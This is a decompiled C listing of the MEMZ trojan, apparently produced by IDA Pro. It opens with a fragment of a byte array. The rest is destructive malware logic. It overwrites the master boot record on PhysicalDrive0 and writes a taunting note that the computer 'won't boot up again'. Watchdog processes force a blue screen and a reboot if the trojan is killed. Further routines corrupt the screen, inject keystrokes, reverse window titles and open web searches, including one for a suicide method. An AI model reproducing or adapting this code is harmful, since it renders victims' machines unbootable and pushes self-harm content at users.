  'p',
  '\x18',
  '\x14',
  '\x18',
  '8',
  '+',
  '\xC0',
  '\x19',
  '\x84',
  '\t',
  '\t',
  '\t',
  '\t',
  '9',
  '\x1C',
  '>',
  'O',
  '\x14',
  '\xBD',
  '3',
  '\x05',
  'P',
  '\x1C',
  '$',
  '\xA9',
  '\x15',
  '\x80',
  '\xF1',
  '\x15',
  '\"',
  '\xFF',
  '\x16',
  'Q',
  '\xFF',
  '\x17',
  'P',
  '\xFF',
  '\x18',
  'M',
  '\xFF',
  '6',
  '|',
  '\xD2',
  'A',
  '\0',
  '\xFF',
  'A',
  '\xFF',
  '\xAD',
  '\x1B',
  '\x9C',
  '4',
  'B',
  '\xE0',
  '\x18',
  '\x80',
  '0',
  '\x1B',
  '\xE9',
  '7',
  'C',
  '0',
  '\x18',
  '\x84',
  '\t',
  'p',
  'p',
  '\t',
  '9',
  'C',
  'M',
  'P',
  '\x1C',
  '\x8D',
  '3',
  'C',
  '\xD0',
  '\x1D',
  'C',
  '\xEE',
  '\f',
  '\x82',
  '\xF1',
  '\xF1',
  '\x1F',
  '$',
  '\xBA',
  'O',
  'F',
  'U',
  '\xD1',
  '\x1E',
  ';',
  '\xFF',
  '\x01',
  '[',
  '7',
  '\x05',
  '\xAD',
  '\xFF',
  '\x16',
  ')',
  '\xFF',
  'O',
  '0',
  '\x80',
  '\x19',
  '\xF0',
  '\xCA',
  '\"',
  '\x8A',
  '&',
  '\x1A',
  '\xE0',
  ')',
  '\"',
  '\xD9',
  '\'',
  ':',
  'p',
  '\x17',
  '#',
  '\x17',
  '\x89',
  ';',
  '\x10',
  ' ',
  '#',
  '\xC0',
  '0',
  '3',
  '\x90',
  '\x1F',
  '$',
  '\x0F',
  '\x81',
  'K',
  '\x99',
  '\x1B',
  'K',
  '\xBD',
  '\x04',
  'D',
  '\x01',
  '\x05',
  '@',
  '\x84',
  '\x06',
  'K',
  '\xCC',
  'H',
  '/',
  'P',
  '\xD0',
  '?',
  '\xE2',
  '\x9D',
  '@',
  '\x81',
  '\x04',
  '/',
  '\x01',
  '\xFF',
  '\x05',
  '\xAD',
  '\xFF',
  '\x06',
  '\xFA',
  '\xFF',
  'P',
  '\x80',
  '\xE9',
  '*',
  'Y',
  '\'',
  ':',
  ' ',
  '&',
  '*',
  '\xA6',
  '*',
  ':',
  'p',
  '#',
  '*',
  '\xF3',
  '}',
  'R',
  '\x80',
  ',',
  '3',
  'l',
  ';',
  '\x80',
  '?',
  'R',
  '\xE8',
  '\x10',
  '+',
  '\xE8',
  '\'',
  'S',
  '\x1F',
  '\x16',
  '\x80',
  '\xF9',
  '[',
  '\x02',
  '\x04',
  ',',
  '*',
  '5',
  'S',
  'o',
  '\x15',
  '\x80',
  '\xF1',
  '[',
  'E',
  '\x05',
  '\x80',
  '\xF1',
  ',',
  '{',
  '1',
  '\b',
  'J',
  '\xFF',
  'W',
  '\x90',
  '\x97',
  '\\',
  '\xD1',
  'O',
  ']',
  '\"',
  'O',
  '\x87',
  '~',
  '\'',
  '\x12',
  '\'',
  'L',
  'F',
  '\xB8',
  'D',
  ']',
  '\xC0',
  '\x05',
  '\x8E',
  '&',
  '\xB8',
  '$',
  '4',
  '$',
  '\xBF',
  '#',
  '4',
  '$',
  '\0',
  '%',
  '\xB8',
  'D',
  'L',
  'F',
  ']',
  '\xC0',
  '\b',
  ']',
  '\xD4',
  '\x05',
  '\xA0',
  '$',
  '4',
  '$',
  '\x89',
  '#',
  '\xBF',
  '#',
  '\x89',
  '#',
  '4',
  '$',
  'L',
  'F',
  '\x9D',
  'E',
  '~',
  '\'',
  '~',
  '\'',
  'p',
  'I',
  '\xF0',
  '\'',
  'h',
  '(',
  'p',
  ')',
  'p',
  'i',
  'h',
  'H',
  '\xF0',
  'G',
  ']',
  '\xFE',
  '\x06',
  '\x87',
  'h',
  '(',
  '~',
  '\'',
  'L',
  '&',
  '\x9D',
  '%',
  '^',
  '\x12',
  '\x04',
  '^',
  '\x10',
  '\x04',
  '^',
  '\x0E',
  '\x04',
  '\x85',
  'p',
  ')',
  '~',
  'G',
  'L',
  'F',
  '^',
  '\x16',
  '\f',
  '\x83',
  '\xF0',
  '\'',
  '~',
  '\'',
  '^',
  '\n',
  '\b',
  '\x81',
  '\xF0',
  'G',
  '^',
  '\x0E',
  '\b',
  '^',
  'F',
  '\x04',
  '^',
  '<',
  '\x05',
  '\x84',
  'H',
  'p',
  'I',
  'h',
  'H',
  ']',
  '\xF4',
  'f',
  '\x85',
  'p',
  'I',
  '\x99',
  ',',
  '9',
  '+',
  '^',
  '\xC0',
  '\x06',
  '^',
  '\xAA',
  '\x06',
  '\x83',
  'p',
  ')',
  '\x12',
  '\'',
  ']',
  '\xC8',
  '\x06',
  '\x81',
  'p',
  'I',
  '^',
  '\xC6',
  '\b',
  '\x81',
  '\x99',
  ',',
  '^',
  '\xD4',
  '\x04',
  '^',
  '\xB6',
  '\x04',
  '\x87',
  '\x99',
  ',',
  '\xFB',
  '.',
  '$',
  '.',
  '\x99',
  ',',
  '^',
  '\xC0',
  '\x0E',
  '^',
  '\xCC',
  '\b',
  '_',
  '\0',
  '\x04',
  '^',
  '\xF6',
  '\x04',
  '\x83',
  'p',
  ')',
  '\0',
  '*',
  '_',
  '\f',
  '\x06',
  '^',
  '\xD2',
  '\f',
  '\x81',
  '\0',
  'J',
  '^',
  '\xC0',
  'l',
  '\xBC',
  'h',
  'H',
  'Y',
  'o',
  'u',
  'r',
  ' ',
  'c',
  'o',
  'm',
  'p',
  'u',
  't',
  'e',
  'r',
  ' ',
  'h',
  'a',
  's',
  ' ',
  'b',
  'e',
  'e',
  'n',
  ' ',
  't',
  'r',
  'a',
  's',
  'h',
  'e',
  'd',
  ' ',
  'b',
  'y',
  ' ',
  't',
  'h',
  'e',
  ' ',
  'M',
  'E',
  'M',
  'Z',
  ' ',
  't',
  'r',
  'o',
  'j',
  'a',
  'n',
  '.',
  ' ',
  'N',
  'o',
  'w',
  ' ',
  'e',
  'n',
  'j',
  'o',
  '_',
  '\xBC',
  '\x06',
  '\x8A',
  'N',
  'y',
  'a',
  'n',
  ' ',
  'C',
  'a',
  't',
  '.',
  '.',
  '.'
}; // weak
const LPVOID lpParameter = &sub_4014CA; // idb
const DWORD dwMilliseconds = 30000u; // idb
LPCSTR lpFile = "https://google.co.ck/search?q=best+way+to+kill+yourself"; // idb
LPCSTR pszSound = "SystemHand"; // idb
int dword_4040E4 = 0; // weak
int dword_4040E8 = 0; // weak
HCRYPTPROV hProv = 0u; // idb


//----- (00401000) --------------------------------------------------------
LRESULT __stdcall sub_401000(HWND a1, UINT a2, WPARAM a3, LPARAM a4)
{
  int savedregs; // [esp+0h] [ebp+0h] BYREF

  if ( a2 != 16 && a2 != 22 )
    return DefWindowProcA(a1, a2, a3, a4);
  sub_401021((int)&savedregs);
  return 0;
}

//----- (00401021) --------------------------------------------------------
BOOL __usercall sub_401021@<eax>(int a1@<ebp>)
{
  int i; // esi
  int v2; // esi
  HMODULE LibraryA; // edi
  FARPROC RtlAdjustPrivilege; // ebx
  FARPROC NtRaiseHardError; // eax
  void (__cdecl *v6)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // esi
  HANDLE CurrentProcess; // eax
  int v9; // [esp-20h] [ebp-28h]
  struct _TOKEN_PRIVILEGES v10; // [esp-18h] [ebp-20h] BYREF
  int v11; // [esp-8h] [ebp-10h] BYREF
  HANDLE v12; // [esp-4h] [ebp-Ch] BYREF
  int v13; // [esp+0h] [ebp-8h] BYREF
  int v14; // [esp+4h] [ebp-4h]

  for ( i = 20; i != 0; --i )
  {
    CreateThread(nullptr, 0x1000u, StartAddress, nullptr, 0, nullptr);
    Sleep(0x64u);
  }
  v2 = v14;
  v14 = a1;
  v9 = v2;
  LibraryA = LoadLibraryA("ntdll");
  RtlAdjustPrivilege = GetProcAddress(LibraryA, "RtlAdjustPrivilege");
  NtRaiseHardError = GetProcAddress(LibraryA, "NtRaiseHardError");
  v6 = (void (__cdecl *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))NtRaiseHardError;
  if ( RtlAdjustPrivilege != nullptr && NtRaiseHardError != nullptr )
  {
    ((void (__cdecl *)(int, int, _DWORD, char *, int, int))RtlAdjustPrivilege)(19, 1, 0, (char *)&v13 + 3, v13, v9);
    v6(-1073741790, 0, 0, 0, 6, &v11);
  }
  CurrentProcess = GetCurrentProcess();
  OpenProcessToken(CurrentProcess, 0x28u, &v12);
  LookupPrivilegeValueA(nullptr, "SeShutdownPrivilege", &v10.Privileges[0].Luid);
  v10.PrivilegeCount = 1;
  v10.Privileges[0].Attributes = 2;
  AdjustTokenPrivileges(v12, false, &v10, 0, nullptr, nullptr);
  return ExitWindowsEx(6u, 0x10007u);
}
// 401021: could not find valid save-restore pair for ebp

//----- (0040114A) --------------------------------------------------------
void __stdcall __noreturn sub_40114A(LPVOID lpThreadParameter)
{
  HANDLE CurrentProcess; // eax
  HANDLE Toolhelp32Snapshot; // edi
  const CHAR *v3; // ebx
  int v4; // esi
  PROCESSENTRY32 pe; // [esp+Ch] [ebp-138h] BYREF
  LPCSTR lpString1; // [esp+134h] [ebp-10h]
  int v7; // [esp+138h] [ebp-Ch]
  LPCSTR lpString2; // [esp+13Ch] [ebp-8h]
  HANDLE hObject; // [esp+140h] [ebp-4h]
  int savedregs; // [esp+144h] [ebp+0h] BYREF

  v7 = 0;
  lpString1 = (LPCSTR)LocalAlloc(0x40u, 0x200u);
  CurrentProcess = GetCurrentProcess();
  GetProcessImageFileNameA(CurrentProcess, lpString1, 512);
  Sleep(0x3E8u);
  while ( 1 )
  {
    Toolhelp32Snapshot = CreateToolhelp32Snapshot(2u, 0);
    pe.dwSize = 296;
    Process32First(Toolhelp32Snapshot, &pe);
    v3 = lpString1;
    v4 = 0;
    do
    {
      hObject = OpenProcess(0x400u, false, pe.th32ProcessID);
      lpString2 = (LPCSTR)LocalAlloc(0x40u, 0x200u);
      GetProcessImageFileNameA(hObject, lpString2, 512);
      if ( lstrcmpA(v3, lpString2) == 0 )
        ++v4;
      CloseHandle(hObject);
      LocalFree((HLOCAL)lpString2);
    }
    while ( Process32Next(Toolhelp32Snapshot, &pe) );
    CloseHandle(Toolhelp32Snapshot);
    if ( v4 < v7 )
      sub_401021((int)&savedregs);
    v7 = v4;
    Sleep(0xAu);
  }
}
// 401B02: using guessed type int __stdcall GetProcessImageFileNameA(_DWORD, _DWORD, _DWORD);

//----- (0040122D) --------------------------------------------------------
void __noreturn start()
{
  const WCHAR *CommandLineW; // eax
  LPWSTR *v1; // eax
  HANDLE FileA; // ebx
  unsigned int v3; // edi
  _BYTE *v4; // esi
  _BYTE *v5; // ecx
  unsigned int i; // ecx
  HANDLE v7; // esi
  unsigned int j; // esi
  CHAR *v9; // esi
  int k; // edi
  SHELLEXECUTEINFOA pExecInfo; // [esp+Ch] [ebp-64h] BYREF
  MSG Msg; // [esp+48h] [ebp-28h] BYREF
  DWORD NumberOfBytesWritten; // [esp+64h] [ebp-Ch] BYREF
  HANDLE hObject; // [esp+68h] [ebp-8h]
  int pNumArgs; // [esp+6Ch] [ebp-4h] BYREF

  dword_4040E4 = GetSystemMetrics(0);
  dword_4040E8 = GetSystemMetrics(1);
  CommandLineW = GetCommandLineW();
  v1 = CommandLineToArgvW(CommandLineW, &pNumArgs);
  if ( pNumArgs > 1 )
  {
    if ( lstrcmpW(v1[1], L"/watchdog") == 0 )
    {
      CreateThread(nullptr, 0, (LPTHREAD_START_ROUTINE)sub_40114A, nullptr, 0, nullptr);
      pExecInfo.lpVerb = (LPCSTR)48;
      pExecInfo.lpParameters = (LPCSTR)sub_401000;
      pExecInfo.hIcon = (HANDLE)"hax";
      pExecInfo.lpFile = nullptr;
      memset(&pExecInfo.lpDirectory, 0, 28);
      pExecInfo.hProcess = nullptr;
      RegisterClassExA((const WNDCLASSEXA *)&pExecInfo.lpVerb);
      CreateWindowExA(0, "hax", nullptr, 0, 0, 0, 100, 100, nullptr, nullptr, nullptr, nullptr);
      while ( GetMessageA(&Msg, nullptr, 0, 0) > 0 )
      {
        TranslateMessage(&Msg);
        DispatchMessageA(&Msg);
      }
    }
    FileA = CreateFileA("\\\\.\\PhysicalDrive0", 0xC0000000, 3u, nullptr, 3u, 0, nullptr);
    hObject = FileA;
    if ( FileA == (HANDLE)-1 )
      ExitProcess(2u);
    v3 = 0;
    v4 = LocalAlloc(0x40u, 0x10000u);
    v5 = v4;
    do
    {
      ++v3;
      *v5 = v5[byte_4021F8 - v4];
      ++v5;
    }
    while ( v3 < 0x12F );
    for ( i = 0; i < 0x7A0; ++i )
      v4[i + 510] = byte_402328[i];
    if ( !WriteFile(FileA, v4, 0x10000u, &NumberOfBytesWritten, nullptr) )
      ExitProcess(3u);
    CloseHandle(hObject);
    v7 = CreateFileA("\\note.txt", 0xC0000000, 3u, nullptr, 2u, 0x80u, nullptr);
    if ( v7 == (HANDLE)-1 )
      ExitProcess(4u);
    if ( !WriteFile(
            v7,
            "YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN.\r\n"
            "\r\n"
            "Your computer won't boot up again,\r\n"
            "so use it as long as you can!\r\n"
            "\r\n"
            ":D\r\n"
            "\r\n"
            "Trying to kill MEMZ will cause your system to be\r\n"
            "destroyed instantly, so don't try it :D",
            0xDAu,
            &NumberOfBytesWritten,
            nullptr) )
      ExitProcess(5u);
    CloseHandle(v7);
    ShellExecuteA(nullptr, nullptr, "notepad", "\\note.txt", nullptr, 10);
    for ( j = 0; j < 0xA; ++j )
    {
      Sleep(*(&dwMilliseconds + 2 * j));
      CreateThread(nullptr, 0, (LPTHREAD_START_ROUTINE)sub_401A0F, *(&lpParameter + 2 * j), 0, nullptr);
    }
    while ( 1 )
      Sleep(0x2710u);
  }
  v9 = (CHAR *)LocalAlloc(0x40u, 0x2000u);
  GetModuleFileNameA(nullptr, v9, 0x2000u);
  for ( k = 5; k != 0; --k )
    ShellExecuteA(nullptr, nullptr, v9, "/watchdog", nullptr, 10);
  pExecInfo.cbSize = 60;
  pExecInfo.lpFile = v9;
  pExecInfo.lpParameters = "/main";
  pExecInfo.fMask = 64;
  pExecInfo.hwnd = nullptr;
  pExecInfo.lpVerb = nullptr;
  pExecInfo.lpDirectory = nullptr;
  pExecInfo.hInstApp = nullptr;
  pExecInfo.nShow = 10;
  ShellExecuteExA(&pExecInfo);
  SetPriorityClass(pExecInfo.hProcess, 0x80u);
  ExitProcess(0);
}
// 40122D: using guessed type void __noreturn start();
// 4021F8: using guessed type _BYTE byte_4021F8[304];
// 4040E4: using guessed type int dword_4040E4;
// 4040E8: using guessed type int dword_4040E8;

//----- (004014CA) --------------------------------------------------------
int __cdecl sub_4014CA(int a1)
{
  int v1; // ecx
  unsigned int v2; // eax
  int v3; // ecx
  int v4; // eax

  v2 = sub_401A37(v1);
  ShellExecuteA(nullptr, "open", (&lpFile)[v2 % 0x22], nullptr, nullptr, 10);
  v4 = sub_401A37(v3);
  return sub_401AE6((double)(v4 % 200) + 1500.0 / ((double)a1 / 15.0 + 1.0) + 100.0);
}
// 4014D5: variable 'v1' is possibly undefined
// 4014F6: variable 'v3' is possibly undefined

//----- (0040153B) --------------------------------------------------------
int __cdecl sub_40153B(int a1, int a2)
{
  int v2; // esi
  int v3; // edi
  int v4; // ecx
  int v5; // esi
  int v6; // ecx
  int v7; // eax
  int v8; // ecx
  int v9; // eax
  int v11; // [esp-4h] [ebp-18h]
  struct tagPOINT Point; // [esp+Ch] [ebp-8h] BYREF

  GetCursorPos(&Point);
  v2 = a2 / 2200 + 1;
  v3 = sub_401A37(2200) % v2;
  v5 = sub_401A37(v4) % v2;
  v7 = sub_401A37(v6);
  v11 = Point.y + v3 * (v7 % 3 - 1);
  v9 = sub_401A37(v8);
  SetCursorPos(Point.x + v5 * (v9 % 3 - 1), v11);
  return 2;
}
// 401565: variable 'v4' is possibly undefined
// 40156F: variable 'v6' is possibly undefined
// 401582: variable 'v8' is possibly undefined

//----- (004015A2) --------------------------------------------------------
int sub_4015A2()
{
  HWND DesktopWindow; // edi
  HDC WindowDC; // esi
  struct tagRECT Rect; // [esp+8h] [ebp-10h] BYREF

  DesktopWindow = GetDesktopWindow();
  WindowDC = GetWindowDC(DesktopWindow);
  GetWindowRect(DesktopWindow, &Rect);
  BitBlt(WindowDC, 0, 0, Rect.right - Rect.left, Rect.bottom - Rect.top, WindowDC, 0, 0, 0x330008u);
  ReleaseDC(DesktopWindow, WindowDC);
  return 100;
}

//----- (004015F8) --------------------------------------------------------
int __cdecl sub_4015F8(int a1)
{
  int v1; // ecx
  int v2; // eax

  CreateThread(nullptr, 0x1000u, sub_401978, nullptr, 0, nullptr);
  v2 = sub_401A37(v1);
  return sub_401AE6((double)(v2 % 30) + 2000.0 / ((double)a1 * 0.125 + 1.0) + 20.0);
}
// 401613: variable 'v1' is possibly undefined

//----- (00401656) --------------------------------------------------------
int sub_401656()
{
  EnumWindows(EnumFunc, 0);
  return 50;
}

//----- (00401667) --------------------------------------------------------
int __thiscall sub_401667(void *this)
{
  unsigned int v1; // eax
  int v2; // ecx

  v1 = sub_401A37((int)this);
  PlaySoundA((&pszSound)[v1 % 3], nullptr, 1u);
  return sub_401A37(v2) % 20 + 20;
}
// 401685: variable 'v2' is possibly undefined

//----- (00401694) --------------------------------------------------------
int __cdecl sub_401694(int a1)
{
  int v1; // ecx
  int v2; // eax
  int v3; // eax
  int v4; // eax
  int v5; // ebx
  int v6; // eax
  int v7; // edi
  int v8; // esi
  int v9; // eax
  HDC v10; // ebx
  int v12; // [esp-Ch] [ebp-3Ch]
  struct tagRECT Rect; // [esp+Ch] [ebp-24h] BYREF
  HWND hWnd; // [esp+20h] [ebp-10h]
  int x; // [esp+24h] [ebp-Ch]
  int y; // [esp+28h] [ebp-8h]
  HDC hdc; // [esp+2Ch] [ebp-4h]

  hWnd = GetDesktopWindow();
  hdc = GetWindowDC(hWnd);
  GetWindowRect(hWnd, &Rect);
  v2 = sub_401A37(v1);
  x = v2 % (Rect.right - 100);
  v3 = sub_401A37(Rect.right - 100);
  y = v3 % (Rect.bottom - 100);
  v4 = sub_401A37(Rect.bottom - 100);
  v5 = v4 % (Rect.right - 100);
  v6 = sub_401A37(Rect.right - 100);
  v7 = v6 % (Rect.bottom - 100);
  v8 = sub_401A37(Rect.bottom - 100) % 600;
  v9 = sub_401A37(600);
  v12 = v5;
  v10 = hdc;
  BitBlt(hdc, x, y, v8, v9 % 600, hdc, v12, v7, 0xCC0020u);
  ReleaseDC(hWnd, v10);
  return sub_401AE6(200.0 / ((double)a1 / 5.0 + 1.0) + 3.0);
}
// 4016BD: variable 'v1' is possibly undefined

//----- (0040176C) --------------------------------------------------------
int __thiscall sub_40176C(void *this)
{
  int v1; // ecx
  struct tagINPUT pInputs; // [esp+0h] [ebp-1Ch] BYREF

  pInputs.type = 1;
  pInputs.ki.wVk = sub_401A37((int)this) % 42 + 48;
  SendInput(1u, &pInputs, 28);
  return sub_401A37(v1) % 400 + 300;
}
// 401799: variable 'v1' is possibly undefined

//----- (004017B0) --------------------------------------------------------
int __cdecl sub_4017B0(int a1)
{
  HWND DesktopWindow; // edi
  HDC WindowDC; // esi
  struct tagRECT Rect; // [esp+8h] [ebp-18h] BYREF

  DesktopWindow = GetDesktopWindow();
  WindowDC = GetWindowDC(DesktopWindow);
  GetWindowRect(DesktopWindow, &Rect);
  StretchBlt(WindowDC, 50, 50, Rect.right - 100, Rect.bottom - 100, WindowDC, 0, 0, Rect.right, Rect.bottom, 0xCC0020u);
  ReleaseDC(DesktopWindow, WindowDC);
  return sub_401AE6(200.0 / ((double)a1 / 5.0 + 1.0) + 4.0);
}

//----- (0040182D) --------------------------------------------------------
int __cdecl sub_40182D(int a1)
{
  int v1; // edi
  int v2; // esi
  HDC WindowDC; // ebx
  HICON IconA; // eax
  int v5; // ecx
  int v6; // esi
  int v7; // ecx
  int v8; // ecx
  int v9; // eax
  int v11; // [esp-8h] [ebp-28h]
  HICON v12; // [esp-4h] [ebp-24h]
  struct tagPOINT Point; // [esp+14h] [ebp-Ch] BYREF
  HWND hWnd; // [esp+1Ch] [ebp-4h]

  v1 = GetSystemMetrics(11) / 2;
  v2 = GetSystemMetrics(12) / 2;
  hWnd = GetDesktopWindow();
  WindowDC = GetWindowDC(hWnd);
  GetCursorPos(&Point);
  IconA = LoadIconA(nullptr, (LPCSTR)0x7F01);
  DrawIcon(WindowDC, Point.x - v1, Point.y - v2, IconA);
  v6 = sub_401A37(v5);
  if ( v6 % sub_401AE6(10.0 / ((double)a1 / 500.0 + 1.0) + 1.0) == 0 )
  {
    v12 = LoadIconA(nullptr, (LPCSTR)0x7F03);
    v11 = sub_401A37(v7) % dword_4040E8;
    v9 = sub_401A37(v8);
    DrawIcon(WindowDC, v9 % dword_4040E4, v11, v12);
  }
  ReleaseDC(hWnd, WindowDC);
  return 2;
}
// 401891: variable 'v5' is possibly undefined
// 4018D2: variable 'v7' is possibly undefined
// 4018DF: variable 'v8' is possibly undefined
// 4040E4: using guessed type int dword_4040E4;
// 4040E8: using guessed type int dword_4040E8;

//----- (00401903) --------------------------------------------------------
BOOL __stdcall EnumFunc(HWND hWnd, LPARAM a2)
{
  sub_401916(hWnd);
  return true;
}

//----- (00401916) --------------------------------------------------------
HWND __cdecl sub_401916(HWND hWnd)
{
  WCHAR *v1; // edi
  HWND result; // eax
  HWND v3; // esi

  v1 = (WCHAR *)GlobalAlloc(0x40u, 0x4000u);
  SendMessageW(hWnd, 0xDu, 0x2000u, (LPARAM)v1);
  sub_401A82(v1);
  SendMessageW(hWnd, 0xCu, 0, (LPARAM)v1);
  GlobalFree(v1);
  for ( result = GetWindow(hWnd, 5u); ; result = GetWindow(v3, 2u) )
  {
    v3 = result;
    if ( result == nullptr )
      break;
    sub_401916(result);
  }
  return result;
}

//----- (00401978) --------------------------------------------------------
DWORD __stdcall sub_401978(LPVOID lpThreadParameter)
{
  DWORD CurrentThreadId; // eax
  HHOOK v2; // esi

  CurrentThreadId = GetCurrentThreadId();
  v2 = SetWindowsHookExA(5, (HOOKPROC)fn, nullptr, CurrentThreadId);
  MessageBoxW(nullptr, L"Still using this computer?", L"lol", 0x1030u);
  UnhookWindowsHookEx(v2);
  return 0;
}

//----- (004019B5) --------------------------------------------------------
LRESULT __thiscall fn(void *this, int code, WPARAM wParam, LPARAM lParam)
{
  _DWORD *v4; // ebx
  int v5; // eax
  int v6; // ecx
  int v7; // esi
  int v8; // et2

  if ( code == 3 )
  {
    v4 = *(_DWORD **)lParam;
    if ( (*(_DWORD *)(*(_DWORD *)lParam + 32) & 0x80400000) != 0 )
    {
      v5 = sub_401A37((int)this);
      v6 = dword_4040E4 - v4[5];
      v7 = v5 % v6;
      v8 = sub_401A37(v6) % (dword_4040E8 - v4[4]);
      v4[7] = v7;
      v4[6] = v8;
    }
  }
  return CallNextHookEx(nullptr, code, wParam, lParam);
}
// 4040E4: using guessed type int dword_4040E4;
// 4040E8: using guessed type int dword_4040E8;

//----- (00401A0F) --------------------------------------------------------
void __stdcall __noreturn sub_401A0F(int (__cdecl *lpThreadParameter)(int, int))
{
  int v1; // esi
  int v2; // ebx
  int i; // edi
  int v4; // eax

  v1 = 0;
  v2 = 0;
  for ( i = 0; ; ++i )
  {
    v4 = v1--;
    if ( v4 == 0 )
      v1 = lpThreadParameter(v2++, i);
    Sleep(0xAu);
  }
}

//----- (00401A37) --------------------------------------------------------
int __fastcall sub_401A37(int a1)
{
  HCRYPTPROV v1; // eax
  BYTE pbBuffer[4]; // [esp+0h] [ebp-4h] BYREF

  *(_DWORD *)pbBuffer = a1;
  v1 = hProv;
  if ( hProv == 0 )
  {
    if ( !CryptAcquireContextA(&hProv, nullptr, nullptr, 1u, 0xF0000040) )
      ExitProcess(1u);
    v1 = hProv;
  }
  CryptGenRandom(v1, 4u, pbBuffer);
  return *(_DWORD *)pbBuffer & 0x7FFFFFFF;
}

//----- (00401A82) --------------------------------------------------------
int __cdecl sub_401A82(LPCWSTR lpString)
{
  int v1; // esi
  int v2; // ebx
  int result; // eax
  int v4; // edx
  WCHAR v5; // cx

  v1 = 0;
  v2 = 0;
  result = lstrlenW(lpString) - 1;
  v4 = result;
  if ( result > 0 )
  {
    do
    {
      v5 = lpString[v2];
      lpString[v2++] = lpString[v4];
      lpString[v4--] = v5;
    }
    while ( v2 < v4 );
  }
  if ( result > 0 )
  {
    do
    {
      if ( lpString[v1] == 10 && lpString[v1 + 1] == 13 )
      {
        lpString[v1] = 13;
        lpString[v1 + 1] = 10;
      }
      ++v1;
    }
    while ( v1 < result );
  }
  return result;
}

//----- (00401AE6) --------------------------------------------------------
int __usercall sub_401AE6@<eax>(double a1@<st0>)
{
  return (int)a1;
}

// nfuncs=26 queued=22 decompiled=22 lumina nreq=0 worse=0 better=0
// ALL OK, 22 function(s) have been successfully decompiled
